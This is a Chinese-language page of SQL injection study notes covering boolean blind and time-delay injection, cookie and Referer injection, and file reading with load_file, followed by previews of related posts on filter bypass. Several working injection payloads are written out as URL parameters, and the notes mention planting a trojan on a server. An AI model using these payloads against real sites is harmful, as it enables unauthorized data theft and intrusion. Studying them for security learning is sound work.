Web安全SQL注入學習筆記二

2021-10-02 10:37:37 字數 1242 閱讀 8428

web安全sql注入學習筆記二

2-6布林盲注

substr(version(),1,1)=『a』擷取字串,第乙個引數要擷取的字串 ,第二個引數擷取的起始位置,第三個是擷取偏移量 這樣的語句就能判斷version的第乙個字元是否為a,這樣進行遍歷,修改紅色位置就能知道所有字串

?id=-1』 or (select substr(version(),1,1)=『a』) %23

然後給他加乙個位置

?id=-1』 or (select substr(table_name,1,1) from information_schema.tables where table_schema=databse()) =『a』 %23

但是這樣的效率過於低下

?id=-1』 or (select ascii( substr(table_name,1,1)) from information_schema.tables where table_schema=databse()) >1 %23 用ascii碼和二分法來確定

還可以使用burp suit的intruder功能對變數進行遍歷

2-7時間延時注入

if(1,sleep(),0)如果第乙個條件為真則sleep兩秒,否則就輸出0,然後就控制第乙個資料是否為真來判斷

將1的位替換為布林盲注的語句,常用於無論怎麼修改sql語句都不報錯的情況

if ((select ascii( substr(table_name,1,1)) from information_schema.tables where table_schema=databse() limit 0,1) >1,sleep(2),0) %23 若語句為真則會睡眠兩秒

2-8 cookie注入

當你輸入正確的使用者名稱密碼,客戶端插入cookie標記你的身份

2-9 http-referer注入

extractvalue()用法

在referer處和之前注入方式一樣,試圖讓它報錯,然後讓它不報錯

2-10讀取和寫入檔案

讀取檔案

load_file(file_name):讀取檔案並返回該檔案的內容作為乙個字串

1) 必須有許可權讀取並且檔案必須完全可讀

2) 欲讀取檔案必須在伺服器上

3) 必須指定檔案的完整路徑

4) 欲讀檔案必須小於max_allowed_packet

burp suite 的decoder 功能可以解碼

往伺服器寫檔案」

這樣思考是否能向裡面寫木馬

web安全SQL注入學習筆記三

2 11空格被設定為過濾時繞過 23被過濾時可以使用 or 進行嘗試 id 1 or 1 1 or or被設定為過濾時可以使用 替代 空格被設定為過濾 09 tab 水平 0a 新建一行 0c 新的一頁 0d return功能 0b tab 垂直 a0 空格 代替空格 id 1 select a0e...

WEB安全之SQL注入學習

sql注入是一種將sql 未經過濾,新增到輸入引數中,傳遞到sql伺服器解析並執行的一種攻擊手法 sql注入的產生 web開發人員無法保證所有的輸入都已經過濾 get請求 post請求 hppt頭資訊 cookie資訊 攻擊者利用傳送給sql伺服器的輸入資料構造可執行的sql 資料庫未做相應的安全配...

SQL注入學習筆記

sql注入漏洞是由於sql語句的呼叫方法不完善而產生的安全隱患。一旦應用中存在sql注入漏洞,就可能造成如下影響。值得注意的是,以下影響中攻擊者都能夠直接對伺服器實施主動攻擊,而不需要使用者參與。根據資料庫引擎的不同,通過sql注入攻擊還可能會達到下列效果。sql注入攻擊能夠以開發者意想不到的方式改...